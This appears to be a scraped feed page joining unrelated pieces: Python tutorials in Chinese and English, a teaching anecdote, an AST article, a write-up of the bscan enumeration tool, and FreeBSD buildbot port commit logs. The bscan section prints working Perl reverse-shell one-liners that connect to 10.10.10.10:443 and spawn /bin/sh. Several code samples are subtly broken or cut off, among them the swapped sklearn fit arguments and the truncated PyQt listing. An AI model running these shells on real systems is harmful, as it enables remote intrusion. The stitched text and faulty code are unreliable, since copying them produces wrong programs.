encoded words.

- StGit's version is now correct/available in the release archive.

- Add continuous integration (travis-ci) and code coverage (coveralls)
support.

- Many new test cases were added.

          使用pytest测试flask应用      Cache   Translate Page      

python 本身就有 unittest 单元测试框架,但是觉得它并不是很好用,我更倾向于使用 pytest 。

下面通过一个例子来介绍如何使用 pytest 对 flask 应用进行单元测试。

首先新建一个 flask 应用,并针对根路径创建一条路由。代码如下:

# server.py app = flask.Flask(__name__) @app.route('/') def home(): return 'ok'

然后针对首页编写单元测试,代码如下:

# tests/test_app.py def test_home_page(client): rv = client.get('/') assert rv.status_code == 200 assert rv.data == b'ok'

然后执行命令运行该测试用例: pytest -s tests/test_app.py

在 pytest 中编写测试用例就只需要新建一个以 test_ 开头的函数即可。

以上是针对flask路由作的最基本测试。接下来编写一个新的路由,该页面只有用户登录之后才能访问。代码如下:

# server.py @app.route('/member') @flask_security.decorators.login_required def member(): user = flask_security.core.current_user return str(user.id)

要对该路由进行测试,则需要先创建一个用户。

# tests/test_app.py def setup_module(module): App.testing = True fixture.setup() def teardown_module(module): """ """

上面的 setup_module 和 teardown_module 函数分别是在所有的测试用例执行之前与执行之后执行。在这里我们通过 setup_module 在执行测试之前先创建一个用户。然后再创建一个 pytest 的 fixture:

# tests/conftest.py @pytest.fixture def auth_client(client): with client.session_transaction() as sess: sess['user_id'] = str(fixture.users[0].id) yield client

这里创建了一个 auth_client fixture,之后所有以 auth_client 发起的请求都是登录状态的。

最后再针对 /member 路由编写两个测试用例,分别是未登录状态与登录状态下的。

def test_member_page_without_login(client): """ 没有登录则跳转到登录页面 """ rv = client.get('/member') assert rv.headers['Location'] == 'http://localhost/login?next=%2Fmember' assert rv.status_code == 302 def test_member_page_with_login(auth_client): """ 已经登录则返回当前用户id """ rv = auth_client.get('/member') assert rv.status_code == 200 assert rv.data.decode('utf8') == str(fixture.users[0].id)

以上就是一个简单的 flask 应用了。但是有时一个稍微复杂一点的应用会用到一些第三方的api。这时针对这种情况编写测试用例时就需要用到 mock 功能了。再编写一个新的路由页面:

# server.py @app.route('/movies') def movies(): data = utils.fetch_movies() if not data: return '', 500 return flask.jsonify(data) # utils.py def fetch_movies(): try: url = 'http://api.douban.com/v2/movie/top250?start=0&count=1' res = requests.get(url, timeout=5) return res.json() except Exception as e: return {}

请求该路由会返回豆瓣top250的电影信息。然后再编写两个测试用例分别模拟api调用成功与失败的情况。

# tests/test_app.py def test_movies_api(client): """ 调用豆瓣api成功的情况 """ fetch_movies_patch = mock.patch('utils.fetch_movies') func = fetch_movies_patch.start() func.return_value = {'start': 0, 'count': 0, 'subjects': []} rv = client.get('/movies') assert rv.status_code == 200 assert func.called fetch_movies_patch.stop() def test_movies_api_with_error(client): """ 调用豆瓣api出错的情况 """ fetch_movies_patch = mock.patch('utils.fetch_movies') func = fetch_movies_patch.start() func.return_value = None rv = client.get('/movies') assert rv.status_code == 500 assert func.called fetch_movies_patch.stop()

这里使用 python 的 mock 模块来模拟让某个函数返回固定的结果。

完整的代码请访问: https://github.com/wusuopu/flask-test-example


          开源工具 | Python数据科学入门      Cache   Translate Page      

开源工具 | Python数据科学入门

不需要昂贵的工具即可领略数据科学的力量,从这些开源工具起步即可。

无论你是一个具有数学或计算机科学背景的资深数据科学爱好者,还是一个其它领域的专家,数据科学提供的可能性都在你力所能及的范围内,而且你不需要昂贵的,高度专业化的企业级软件。本文中讨论的开源工具就是你入门时所需的全部内容。

python ,其机器学习和数据科学库( pandas 、 Keras 、 TensorFlow 、 scikit-learn 、 SciPy 、 NumPy 等),以及大量可视化库( Matplotlib 、 pyplot 、 Plotly 等)对于初学者和专家来说都是优秀的自由及开源软件工具。它们易于学习,很受欢迎且受到社区支持,并拥有为数据科学而开发的最新技术和算法。它们是你在开始学习时可以获得的最佳工具集之一。

许多 Python 库都是建立在彼此之上的(称为依赖项),其基础是 NumPy 库。NumPy 专门为数据科学设计,经常被用于在其 ndarray 数据类型中存储数据集的相关部分。ndarray 是一种方便的数据类型,用于将关系表中的记录存储为 cvs 文件或其它任何格式,反之亦然。将 scikit 函数应用于多维数组时,它特别方便。SQL 非常适合查询数据库,但是对于执行复杂和资源密集型的数据科学操作,在 ndarray 中存储数据可以提高效率和速度(但请确保在处理大量数据集时有足够的 RAM)。当你使用 pandas 进行知识提取和分析时,pandas 中的 DataFrame 数据类型和 NumPy 中的 ndarray 之间的无缝转换分别为提取和计算密集型操作创建了一个强大的组合。

作为快速演示,让我们启动 Python shell 并在 pandas DataFrame 变量中加载来自巴尔的摩的犯罪统计数据的开放数据集,并查看加载的一部分 DataFrame:

>>> import pandas as pd >>> crime_stats =pd.read_csv('BPD_Arrests.csv') >>> crime_stats.head()
开源工具 | Python数据科学入门

我们现在可以在这个 pandas DataFrame 上执行大多数查询,就像我们可以在数据库中使用 SQL 一样。例如,要获取 Description 属性的所有唯一值,SQL 查询是:

$ SELECT unique(“Description”) from crime_stats;

利用 pandas DataFrame 编写相同的查询如下所示:

>>> crime_stats['Description'].unique() ['COMMON ASSAULT' 'LARCENY' 'ROBBERY - STREET' 'AGG. ASSAULT' 'LARCENY FROM AUTO' 'HOMICIDE' 'BURGLARY' 'AUTO THEFT' 'ROBBERY - RESIDENCE' 'ROBBERY - COMMERCIAL' 'ROBBERY - CARJACKING' 'ASSAULT BY THREAT' 'SHOOTING' 'RAPE' 'ARSON']

它返回的是一个 NumPy 数组(ndarray 类型):

>>>type(crime_stats['Description'].unique()) <class 'numpy.ndarray'>

接下来让我们将这些数据输入神经网络,看看它能多准确地预测使用的武器类型,给出的数据包括犯罪事件,犯罪类型以及发生的地点:

>>> from sklearn.neural_network import MLPClassifier >>> import numpy as np >>> >>> prediction = crime_stats[[‘Weapon’]] >>> predictors = crime_stats['CrimeTime', ‘CrimeCode’, ‘Neighborhood’] >>> >>> nn_model = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1) >>> >>>predict_weapon = nn_model.fit(prediction, predictors)

现在学习模型准备就绪,我们可以执行一些测试来确定其质量和可靠性。对于初学者,让我们输入一个训练集数据(用于训练模型的原始数据集的一部分,不包括在创建模型中):

>>>predict_weapon.predict(training_set_weapons) array([4, 4, 4, ..., 0, 4, 4])

如你所见,它返回一个列表,每个数字预测训练集中每个记录的武器。我们之所以看到的是数字而不是武器名称,是因为大多数分类算法都是用数字优化的。对于分类数据,有一些技术可以将属性转换为数字表示。在这种情况下,使用的技术是标签编码,使用 sklearn 预处理库中的 LabelEncoder 函数: preprocessing.LabelEncoder() 。它能够对一个数据和其对应的数值表示来进行变换和逆变换。在这个例子中,我们可以使用 LabelEncoder() 的 inverse_transform 函数来查看武器 0 和 4 是什么:

>>>preprocessing.LabelEncoder().inverse_transform(encoded_weapons) array(['HANDS', 'FIREARM', 'HANDS', ..., 'FIREARM', 'FIREARM', 'FIREARM']

这很有趣,但为了了解这个模型的准确程度,我们将几个分数计算为百分比:

>>>nn_model.score(X,y) 0.81999999999999995

这表明我们的神经网络模型准确度约为 82%。这个结果似乎令人印象深刻,但用于不同的犯罪数据集时,检查其有效性非常重要。还有其它测试来做这个,如相关性、混淆、矩阵等。尽管我们的模型有很高的准确率,但它对于一般犯罪数据集并不是非常有用,因为这个特定数据集具有不成比例的行数,其列出 FIREARM 作为使用的武器。除非重新训练,否则我们的分类器最有可能预测 FIREARM ,即使输入数据集有不同的分布。

在对数据进行分类之前清洗数据并删除异常值和畸形数据非常重要。预处理越好,我们的见解准确性就越高。此外,为模型或分类器提供过多数据(通常超过 90%)以获得更高的准确度是一个坏主意,因为它看起来准确但由于 过度拟合 而无效。

Jupyter notebooks 相对于命令行来说是一个很好的交互式替代品。虽然 CLI 对于大多数事情都很好,但是当你想要运行代码片段以生成可视化时,Jupyter 会很出色。它比终端更好地格式化数据。

这篇文章 列出了一些最好的机器学习免费资源,但是还有很多其它的指导和教程。根据你的兴趣和爱好,你还会发现许多开放数据集可供使用。作为起点,由 Kaggle 维护的数据集,以及在州政府网站上提供的数据集是极好的资源。

【责任编辑:庞桂玉 TEL:(010)68476606】


          Transfer files from laptop to mobile using Python      Cache   Translate Page      

If you think that you need some fancy applications to tranfer files from your laptop/computer to mobile, than you are wrong.

All you need is python

NOTE: Your laptop and your mobile phone should be on same network

Let's get started

Open your terminal and execute this command.

If you are using Python3 :

python -m http.server

If you are using Python2 :

python -m SimpleHTTPServer

When you will execute this command it will create a HTTP server on your local machine.


Transfer files from laptop to mobile using Python

Type <IP_Address>:8000 in your mobile browser to access the files in the directory where you ran the above command.

If you don't know your IP than follow this steps:

Go to System Preferences -> Network-> You will see your IP address there

Suppose your IP address is 192.168.0.1 then open mobile browser and type 192.168.0.1:8000 to access the files.


Transfer files from laptop to mobile using Python

If you like this post, then also check out my blog: SourceAI


          Python Tip:Jupyter notebook如何导出PDF文件?      Cache   Translate Page      

问题背景:利用Jupyter notebook做好交互的数据分析或者模型后,想导出PDF文件作为简单版的报告或者交流的材料。如何从Jupyter notebook 导出PDF文件?并且对于有中文的情况,标题和正文都不含有乱码。

解决方案

以Window操作系统为例,具体解决步骤如下: 1 安装miktex 安装链接如下: https://miktex.org/download 下载成功后,按着默认依次安装好

2 修改配置文件 2.1 Anaconda3\Lib\site-packages\nbconvert\templates\latex\article.tplx

把\documentclass[11pt]{article}修改成为 \documentclass[11pt]{ctexart}

2.2 Anaconda3\Lib\site-packages\nbconvert\templates\latex\base.tplx

注释:%\usepackage[T1]{fontenc} 把 ((* block title *))\title{((( resources.metadata.name | ascii_only | escape_latex )))} ((* endblock title *))

修改为:

((* block title *))\title{((( resources.metadata.name | escape_latex )))} ((* endblock title *))

3 重启电脑,然后再次开启Jupyter notebook,应该就可以把notebook文件导出为PDF文件了。

参考资料:

1 https://github.com/jupyter/notebook/issues/2848 2 https://ask.hellobi.com/blog/zhaolin/10697

有什么问题,请留言。

数据人网是数据人学习,交流和分享的平台,诚邀您创造和分享数据知识,共建和共享数据智库。


          One in a Million: Teaching Coding With Python      Cache   Translate Page      

I’ve been teaching programming for more than 17 years. During this period, I’ve developed a nice inventory of exercises and code examples. Some of which are old as my teaching career, and even though I’ve taught, and continue to teach, a variety of languages, well, most examples are as good in any language.

Here is one of them ― I use it in the first lesson on conditionals. This program generates a random number in the range of [0, 100] and then asks the user to guess it. The user gets one chance ― it’s a very early lesson and the students don’t know loops yet. The program outputs “Correct” or “Wrong” and that’s it. Look at it (this time in python, because that’s the language I teach now): import random compNum = (int)(random.random() * 101) userGuess = (int)(input(“Enter your guess:”)) if compNum == userInput: print(“Correct”) else: print(“Wrong”)

Yeah, it’s simple, but yet pretty powerful example. When I show it I type it during the class and then ask the students to try and guess. I know it sounds silly and with no avail, but believe me, it’s such fun!

No one ever manages to guess correctly.

Today, I’ve shown this example again, and, as usual, invited the students to try their luck. One of them yelled from her sit “31.”

“Verywell,” I said, “31 for the lady.” And typed in 31.

I pressed enter.

And boom.

I saw “Correct” on the screen.

It was so surprising that I couldn’t talk for a second because it was the first time in 17 years that it ahd happened.

I think now I know the meaning of the phrase “One in a million”!

P.S.Yeah, I know there are better ways to generate random numbers, I deliberately use this one because it shows a really important principle in software engineering.


          A study aid using Python and PyQt      Cache   Translate Page      

About a year ago, I took a course in Arabic. In addition to being a right-to-left written language, Arabic has its own alphabet. Since this was an introductory class, I spent most of my time working my way through the Arabic alphabet.

So I decided to create a study aid: It would present an Arabic letter, I would formulate a guess, and it would tell me whether or not I had answered correctly. Some brief experimentation, however, showed that this approach would not work―the letters appeared so small that I couldn’t be sure what I was seeing on the command line.

More python Resources

What is Python? Top Python IDEs Top Python GUI frameworks Latest Python content More developer resources My next idea was to come up with some sort of window display of the glyph that was large enough to easily recognize. Since PyQt

Upon delving in, I discovered a number of resources on the web, and as I began to experiment, I needed to make sure all the code correlated. In particular, there have been changes in the organization of PyQt as it has gone from PyQt 4 to PyQt 5, and the latter requires Python 3.

After getting this all straightened out, here is what I came up with:

#!/usr/bin/python3

# -*- coding: utf-8 -*-

"""

arabic.py

An exercise for learning Arabic letters. An Arabic letter is shown, the name of which can the guessed.

Hover the mouse cursor over the letter to see its name in a Tool Tip. Click Next to load another

letter.

import sys

from random import randint

from PyQt5. QtCore import *

from PyQt5. QtGui import QFont

from PyQt5. QtWidgets import QWidget , QLabel , QApplication , QToolTip , QPushButton

class Example ( QWidget ) :

def __init__ ( self , parent = None ) :

super ( Example , self ) . __init__ ( parent )

self . initUI ( )

def initUI ( self ) :

QToolTip. setFont ( QFont ( 'DejaVuSans' , 30 ) )

i = randint ( 0 , 37 )

self . lbl2 = QLabel ( L [ 12 ] , self ) self . lbl2 . setToolTip ( lname [ 12 ] + ' \n ' )

self . lbl2 . setFont ( QFont ( 'FreeSerif' , 40 ) )

self . lbl2 . setTextFormat ( 1 )

self . lbl2 . setAlignment ( Qt. AlignVCenter )

self . lbl2 . setAlignment ( Qt. AlignHCenter )

butn = QPushButton ( "Next" , self )

butn. move ( 70 , 70 )

butn. clicked . connect ( self . buttonClicked )

self . setGeometry ( 300 , 300 , 160 , 110 )

self . setWindowTitle ( 'Arabic Letters' )

self . show ( )

def buttonClicked ( self ) :

i = randint ( 0 , 37 )

self . lbl2 . setFont ( QFont ( 'FreeSerif' , 40 ) )

self . lbl2 . setTextFormat ( 1 )

self . lbl2 . setText ( L [ i ] )

self . lbl2 . setAlignment ( Qt. AlignVCenter )

self . lbl2 . setAlignment ( Qt. AlignHCenter )

self . lbl2 . setToolTip ( lname [ i ] + ' \n ' )

if __name__ == '__main__' :

lname = [ 'alif' , 'beh' , 'teh' , 'theh' , 'jim' , 'ha' , 'kha' , 'dal' , 'dhal' , 'ra' , 'zin' , 'sin' , 'shin' , 'Sad' , 'Dad' , 'Ta' , 'DHa' , 'ain' , 'ghain' , 'feh' , 'qaf' , 'kaf' , 'lam' , 'mim' , 'nün' , 'heh' , 'waw' , 'yeh' , 'Sifr' , 'wáaHid' , 'ithnáyn' , 'thaláatha' , 'árba:ah' , 'khámsah' , 'sittah' , 'sáb:ah' , 'thamáanyah' ,
          Exploring the Abstract Syntax Tree      Cache   Translate Page      
Exploring the Abstract Syntax Tree

Hacktoberfest had me get out of my comfort zone and contribute to different codebases. One of them, a python linter gave me exposure using the python Abstract Syntax Tree.

What is an Abstract Syntax Tree? An abstract syntax tree (AST) is a way of representing the syntax of a programming language as a hierarchical tree-like structure.

In essence we can take a line of code such as this:

pressure = 30

and convert it into a tree structure:


Exploring the Abstract Syntax Tree

Wikipedia has a slightly different definition:

An AST is usually the result of the syntax analysis phase of a compiler. It often serves as an intermediate representation of the program through several stages that the compiler requires, and has a strong impact on the final output of the compiler.

So the AST is one of the stages towards creating compiled code. Definitely feels like we are getting closer to what the machine understands!


Exploring the Abstract Syntax Tree

What this enables us to do is to step through the structure of a program and report any issues back (similar to intellisense/linters) or even change the code that is written.

Python provides a library for parsing and navigating an Abstract Syntax Tree and is aptly called ast.

Using the previous example we can create an ast by using the following command:

import ast code = 'pressure = 3' tree = ast.parse(code)

Simply printing the tree won’t display the structure and nodes that we want. Instead we can create a node visitor that will traverse the tree and give us details on each of the nodes:

class Visitor(ast.NodeVisitor): def generic_visit(self, node): print(type(node).__name__) ast.NodeVisitor.generic_visit(self, node)

Now if we create an instance of this visitor class, when we call visitor.visit(code) we will get the following output:

Module

Assign

Name

Store

Num

For a linter this is quite useful to see if any of these node orderings are invalid. A good example of this is when you have if True:… a redundant if statement since it always evaluates to the same result.

When we run visit on an if True:… we get the following:

Module

If

NameConstant

Expr

Ellipsis

In this case the True value is the NameConstant . The ast visitor allows us to create specific methods that get invoked when a particular ClassName is visited. This is achieved using the following syntax:

def visit_{className}(self, node):

In this case we are wanting to visit any If node and check it’s test condition to ensure that it isn’t just a NameConstant (True, False or None). This is where the ast documentation is quite useful as you can see what properties are available for each node type. We can access the node.test condition like so:

statement = "If statement always evaluates to {} on line {} " def visit_If(self, node): condition= node.test if isinstance(condition, ast.NameConstant): print(statement.format(condition.value, node.lineno)) ast.NodeVisitor.generic_visit(self, node)

Running this on our previous example gives us a nice detailed message:

If statement always evaluates to True on line 1

You are not limited to only ‘visiting’ a node in the AST. Using another one of pythons classes you can use ast.NodeTransformer to modify them too! This leads to really cool possibilities like inserting temporary lines of code to test code coverage of your program or even transpile to other languages

I recommend checking out the following resources if you are looking to make use of ast in python:

Green Tree Snakes - the missing Python AST docs

^ This one even includes a live web AST visualizer which can help see the code structure quickly!

Official AST Documentation

A copy of the code in this post can be found here

The next thing I would like to investigate is using the NodeTransformer to potentially transpile from python over to another language like javascript.

Thanks for reading!

Share your experience/use cases for AST in the comments below!


          bscan:信息收集和服务枚举工具      Cache   Translate Page      
前言

bscan是一个主动信息收集和服务枚举工具。其核心是异步spawn扫描实用程序进程,重利用控制台高亮输出显示的扫描结果和定义的目录结构。

安装

bscan虽然是为了在Kali linux上运行而开发的,但并不是说只支持Kali。只要系统安装了必要的运行环境就可以正常运行。

从PyPI下载最新的打包版本:

pip install bscan

或从版本控制中获取最新版本:

pip install https://github.com/welchbj/bscan/archive/master.tar.gz 基本使用

bscan为我们提供了多种配置选项,你可以根据需要进行调整。以下是一个简单的示例:

$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

max-concurrency 3:表示一次运行不超过3个并发扫描子进程

patterns [Mm] icrosoft:定义了一个自定义正则表达式模式,用于高亮显示生成扫描输出中的匹配项

status-interval 10:告诉bscan每10秒打印一次运行时状态更新

verbose-status:表示每个状态更新都将打印所有当前运行的扫描子进程的详细信息

scanme.nmap.org:想要枚举的主机

bscan还依赖于一些额外的配置文件。默认文件可以在bscan/configuation目录中找到,这些文件的主要用途如下:

patterns.txt : 指定与扫描输出匹配时在控制台输出中高亮显示的正则表达式模式

required-programs.txt : 指定bscan计划使用的已安装程序

port-scans.toml : 定义在目标上运行的端口发现扫描,以及用于从扫描输出中解析端口号和服务名的正则表达式

service-scans.toml : 定义在目标上运行的扫描

bscan所有可用选项介绍:

usage: bscan [OPTIONS] targets
_
| |__ ___ ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|
an asynchronous service enumeration tool
positional arguments:
targets 要执行枚举的目标和/或网络
optional arguments:
-h, --help 显示帮助信息并退出
--brute-pass-list F 用于执行爆破的密码列表文件名
--brute-user-list F 用于执行爆破的用户列表文件名
--cmd-print-width I 当打印用于spawn一个正在运行子进程命令所允许的最大整数字符数(默认为80)
--config-dir D 从中加载配置文件的基目录; 这个目录中缺少的必要配置文件将从该程序附带的默认文件中加载
--hard 强制覆盖现有目录
--max-concurrency I 允许同时运行的最大整数子进程数(默认为20)
--no-program-check 禁用检查是否存在所需的系统程序
--no-file-check 禁用检查是否存在文件例如已配置的wordlists文件
--no-service-scans 禁用对已发现服务运行扫描
--output-dir D 写入输出文件的基目录
--patterns [ [ ...]] 要在输出文本中高亮显示的正则表达式模式
--ping-sweep 在运行更密集的扫描之前,从网络范围启用ping扫描过滤主机
--quick-only 是否只运行快速扫描(不包括对所有端口的彻底扫描)
--qs-method S 执行初始TCP端口扫描,必须对应于已配置的端口扫描
--status-interval I 打印状态更新之间暂停的整数秒数; 非正值会禁用更新(默认为30)
--ts-method S 执行彻底TCP端口扫描,必须对应于已配置的端口扫描
--udp 是否运行UDP扫描
--udp-method S 执行UDP端口扫描,必须对应于已配置的端口扫描
--verbose-status 是否根据`--status-interval`参数指定的频率,打印详细的运行时状态更新
--version 版本信息
--web-word-list F 用于扫描的字典列表

bscan中包含了两个主要的实用程序(bscan-wordlists和bscan-shells)。bscan-wordlists是一个用于在Kali Linux上查找wordlist文件的程序。它会搜索一些默认目录,并允许glob文件名匹配。以下是一个简单的使用示例:

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

有关更多参数选项可以通过bscan-wordlists help来查看。

bscan-shells可根据你提供的目标地址和端口,为你生成各种类型的反向shell。以下是一个简单的示例,列出了所有基于Perl的shell,并被配置为回连10.10.10.10的443端口。

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

注:bscan-shells使用的这些命令是从reverse-shells.toml配置文件中提取的。有关更多参数选项可以通过bscan-shells help命令查看。

视频演示: https://asciinema.org/a/207654?autoplay=1&speed=2

开发

首先,设置一个新的开发环境以及安装依赖项(使用 virtualenvwrapper / virtualenvwrapper-win ):

# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev
# get the deps
pip install -r dev-requirements.txt

Lint和项目类型检查(这些也运行在 Travis ):

flake8 . && mypy bscan

打包新版本:

# build source and wheel distributions
python setup.py bdist_wheel sdist
# run post-build checks
twine check dist/*
# upload to PyPI
twine upload dist/*

*参考来源: GitHub ,FB小编secist编译,转载请注明来自CodeSec.Net


          Do annotation for my dataset      Cache   Translate Page      
I would like to hire a freelancer to do annotations to my image dataset (total number of images is less than 100) using VIA 1.0 (Budget: ₹600 - ₹1500 INR, Jobs: Algorithm, Artificial Intelligence, C Programming, Machine Learning, Python)
          Automation Solution Architect - Cognizant - Wisconsin Rapids, WI      Cache   Translate Page      
Experience in VB Script, JavaScript, Python, Perl, Bash or Power shell is helpful. Hands on development experience in any of the programming languages/platforms...
From Cognizant - Fri, 12 Oct 2018 17:17:41 GMT - View all Wisconsin Rapids, WI jobs
          A Practical Implementation of the Faster R-CNN Algorithm for Object Detection (Part 2 – with Python codes)      Cache   Translate Page      
Introduction Which algorithm do you use for object detection tasks? I have tried out quite a few of them in my quest to build ... The post A Practical Implementation of the Faster R-CNN Algorithm...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

          #1: Python Crash Course: A Hands-On, Project-Based Introduction to Programming      Cache   Translate Page      
Python Crash Course
Python Crash Course: A Hands-On, Project-Based Introduction to Programming
Eric Matthes
(25)

Buy new: CDN$ 45.95 CDN$ 45.05
44 used & new from CDN$ 41.87

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          #4: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 84.05 CDN$ 53.44
46 used & new from CDN$ 48.05

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          #10: Python for Everybody: Exploring Data in Python 3      Cache   Translate Page      
Python for Everybody
Python for Everybody: Exploring Data in Python 3
Charles Severance , Aimee Andrion , Elliott Hauser , Sue Blumenberg
(7)

Buy new: CDN$ 1.29

(Visit the Bestsellers in Programming list for authoritative information on this product's current rank.)
          devel/py-buildbot - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-console-view - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-grid-view - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-pkg - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
          devel/py-buildbot-waterfall-view - 1.5.0      Cache   Translate Page      
devel/py-buildbot{-*}: Update to 1.5.0 All ports (where necessary): - Fix and equalize *_DEPENDS (and specified versions) to setup.py. - Match COMMENT to setup.py:description. - Add commented LICENSE_FILE describing why its not defined. py-buildbot{-worker}: - Enable concurrent (Multiple Python version) installation. - Update test targets to set PYTHONPATH, so that the package in WRKSRC. is tested, not installed packages. py-buildbot: - Remove post-patch target, no longer necessary. - Add test dependency not declared in setup.py:test_requires, that cause tests to fail when not installed, unlike other dependencies that are skipped. - Add an un-referenced compulsory RUN_DEPENDS on pyyaml reported and resolved upstream [1]. py-buildbot-worker: - Update patch-setup.py to actually fix (package/install) the VERSION file, rather than just not installing it. The worker passes this files contents to the master for display in the frontend if it exists, otherwise sending the string 'latest' or the modification datestamp of another file. [1] - Fix startup script to use the filename of itself (the executed script), not a filename that uses the ${name} variable, which doesnt exist as it contains an underscore (not a dash), causing the following error when executed: /usr/local/etc/rc.d/buildbot-worker: /usr/local/etc/rc.d/buildbot_worker: not found Changelog: http://docs.buildbot.net/current/relnotes/index.html#buildbot-1-5-0-2018-10-09 [1] https://github.com/buildbot/buildbot/pull/4394 Requested by: Tao Zhou Reviewed_by: Nathan Owens , 0mp Differential Revision: D17821
